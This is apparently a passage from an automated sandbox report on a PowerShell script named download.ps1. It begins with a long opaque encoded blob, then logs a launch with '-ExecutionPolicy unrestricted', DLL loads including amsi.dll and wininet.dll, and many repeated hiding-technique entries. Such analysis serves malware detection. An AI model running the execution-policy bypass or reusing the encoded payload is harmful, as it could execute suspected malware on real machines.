"J7w7eXJxdGp3bpz7UVhvoAP3Sy3zkHIE+O/uwMvLEzU1flOntsQaT2IOfGgQfmH77r9pMX9m+V64Ef6U7o5+6KAZUEttdafh1NIfLJ0jIb2EgezQxytOjpCNhZv4wf74ZAtNAouMv4W9IJ4opggJo82o6zYs86/4pausJJ+uKFdPFMyE/cLNi4a0e0WsUk6cUMwsgtmISzWOn82Ck9yYhLeu2uTcwB4QN4GMhwt+whXMEkoejUjKmR0mY80UsUyUzeBUgm3HC7IdNZ3S31Ko4gGiQq7pCe6sVoDIrp9tPsSguBawi9xeoPSrPmVGQ+rzQ98dnNe06h2FhGcNomz9/M3mLJjPmwicAFhQdsPmYPxnDCp4ZE7IzR/EhQ/de8o+T0tqjsuoQz3UeYk331o6177MTREY4x+q7cBb1hj8I7/jlY36W95e08/9wZ2bmqRKf0ptjKyI0SzO5Y4yD1yKBIDADdfJiveRL8qStAIrUyX8Qc+Z9QAvqe4SvLnlPVh7fhma3iaSJiGDmHy5f6ruuy0L6nBYuX40cxv5gpSyyCfvcfb7r+VIZFXhbjXMYxze0GtoCwcciROUiY+QDHLUygxnBiSJEmeggnzU/zA+qVRUKK7FhoynnTigc78XiWUkp1zCCG7cukP3jDJwiTNdtrxZU8T0Ta49NubFuwsBFUYRiFrEk4Yep1XO8umAMzb2Yq5RqPAG75Oql9i+3sCMph+2q2LaY+CGWpsJaGWJ8npQgfpK/q7Gz2NfBwP9nV1WHwkCf0lFNs9iCYB0ZRal3EQuma/Pt3ze/5v4i+w0ZigWmIi8dn2ZB1xAn73eu22lakRgXVSmrHq0VULszm2RxNQ1RH42aKorAd0zgP3Ttu25uCdxCnmL/d5ShcSlpBwDr9pNQENfotFrZICgP/GavsaXOUFCHLjqGKlIVgT6wW9x+fnSqBZmAeWmvzieG7u7iIoEaFPLddy4J8qPFRAw0KDmmsnRCYacQcTUivkOS1QKVM6SyYTOsKeX0+d2ggYgx4zK/K2uyx2Krdiy8eTeqGfhxZGakIwYwt4dBR6XiZ3ozRagFxnExh4PTpAFkc2D0sKAltU278cdw4W/ahFs8dQ4rbJVEPOJTGeda0AYhbdgeT5QtxjFvr1uGhSKtqYPMShPPjpPENr3gasSP3r6p4ktBrxlV63zaq6F/RLuJlr/l9UwVYAq+diw53qzL/w0EfJaqOu6ESl3OmbhR4+v53kwt3U5upc6qnlTe+pmDgZGNs8iNrTInZw5AZgY9Ug2VzPZr4FLdTl91cR46gk3RonXa7ctVc5agk3KjbuqG5204f54VTr6homUnRDk9R4iyI42JspuhOKLJwCqnGQBdbpcH2HCfkHlKOWItlPdbD7B4AnjpDOSMhbuV6W60HjYTkoxWoCJVVGXqzXe+S2jN6SFInAsgWdtOPvufQR8xIIdZHHhaL2DXtWFt4DU8mt7sJjcmF93pRmZW3++OaifRQejwtC9ATITKzZ5S9eyOiPkPPGl8cwBd+ks958ApBhrzImy219ee2DV/Ja7qiZ+CsI/ITxxw3E0UO10jkFYEpG8gl+phH04CPzRGNzWvgl2j988hCnzdNiF+nUyXB1vrgAE89lWHnqOQQolS3qTnavd6yyUdq+cck7RPahMl32tDxkQA5HcBtlEzaEj8h/eA3kEdFanaL2C6Ak6ccWZGCl/7t36l9h2pqBmnAafVVaR9Ygq/VfgLRvFOwOnQxqLPd2qeyDyjiM/OPCBjlp38kZBFt3xIn3t1Nm+6oJjL7ijXqWV9kn5mNY0v4rIfu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[B}X source: powershell.exe, 00000001.00000002.36324659770.00000257B48AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B47BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb{ source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb(h source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbS source: powershell.exe, 00000001.00000002.36326314777.00000257B4BFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE0B99D2A5 pushad ; iretd 1_2_00007FFE0B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE0BAB1905 push eax; iretd 1_2_00007FFE0BAB1A19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE0BAB00BD pushad ; iretd 1_2_00007FFE0BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE0BAB508D push ebp; iretd 1_2_00007FFE0BAB50A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE0BD0725D push edx; retf 1_2_00007FFE0BD0726B

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
